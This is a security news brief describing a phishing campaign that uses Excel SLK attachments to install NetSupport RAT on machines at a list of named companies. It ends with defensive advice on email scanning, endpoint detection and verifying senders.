The researchers at MalwareHunterTeam have discovered a new phishing campaign targeting at least 13 companies, some of them very well known. This new campaign uses SLK (Symbolic Link) file attachments that are used by the Microsoft Excel program to share data between spreadsheets. The emails are sent from accounts that try to impersonate clients or company venders. If an employee opens the SLK file and clicks the “Enable Content” button as instructed by the attackers, commands in the SLK file cause Excel to save a .BAT (batch) file to the %TEMP% folder and execute it, which will use msiexec.exe to download an installer file from a remote server and install malware. Once the installer has been executed, the employee’s workstation will be infected with NetSupport RAT. Gaining access to corporate networks is a possible goldmine for attackers, it would allow them to steal corporate secrets, financial documents, ransomware attacks and a multitude of other damaging attacks. The 13 companies that were originally targeted are:
- A2B Australia Limited
- Asarco LLC
- AusNet Services
- Bega Cheese
- Boc Group Inc
- Glad Products Company
- Hasbro
- Hydratight
- Iridium
- Messer LLC
- MutualBank
- Pact Group
- Sappi North America
On February 17th, MalwareHunterTeam reported yet another company, Beach Energy Limited, targeted by the same attack. It is likely that more major companies across multiple industry segments will continue to be targeted as long as the attack technique is effective.
Analyst Notes
With phishing emails being the primary method of malware transmission, there are several things that companies can all do to protect employees, brand, and data. Include SLK file inspection as part of email threat scanning filters. Use Endpoint Detection and Response (EDR) software that detects attacker behaviors such as batch files executed by Microsoft Word or Excel, or msiexec used to install a file from a remote server. If an email with attachments is received that is unexpected or sent from an email address not normally used by the company it claims to be from, it is recommended that the recipient, prior to opening the attachment, contact the sender’s company by using the corporate phone number or email address to verify that they sent the email. Do not use the sender’s email address as it could be held by an attacker.
